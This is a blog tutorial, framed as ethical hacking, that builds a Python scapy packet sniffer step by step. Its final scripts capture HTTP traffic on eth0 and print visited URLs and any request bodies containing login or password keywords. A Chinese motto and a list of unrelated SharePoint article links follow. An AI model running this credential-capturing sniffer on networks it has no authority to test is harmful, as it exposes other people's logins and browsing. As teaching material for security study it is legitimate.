• Python Ethical Hacking


    PACKET_SNIFFER

    • Capture data flowing through an interface.
    • Filter this data.
    • Display Interesting information such as:
      • Login info(username&password).
      • Visited websites.
      • Images.
      • ...etc

    PACKET_SNIFFER

    CAPTURE & FILTER DATA

    • scapy has a sniffer function.
    • Can capture data sent to/from iface.
    • Can call a function specified in prn on each packet.

    Install the third party package.

     pip install scapy_http

    1. Write the Python to sniff all the Raw packets.

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                print(packet.show())
    
    sniff("eth0")

    Execute the script and sniff the packets on eth0.

    2. Filter the useful packets

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                print(packet[scapy.all.Raw].load)
    
    sniff("eth0")

     Execute the script and sniff the packets on eth0.

    Rewrite the Python Script to filter the keywords.

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                load = packet[scapy.all.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")

     Add the feature - Extracting URL

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
            print(url)
    
            if packet.haslayer(scapy.all.Raw):
                load = packet[scapy.all.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    通过WCF引用ListData.svc查询,更新数据
    SharePoint2010 BCS搜索结果的标题
    多个Finder方法的外部内容类型
    SharePoint 2010 中的BCS身份验证模式
    使用Visual Studio工作流发布SharePoint网页
    PerformancePoint Services故障排除
    使用SharePoint 2010模式对话框
    在自定义字段类型的CAML中使用AJAX jQuery
    扩展Visual Studio 2010服务器资源管理器中的SharePoint结点
    BCS配置文件页、爬网与搜索
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11386213.html
Copyright © 2020-2023  润新知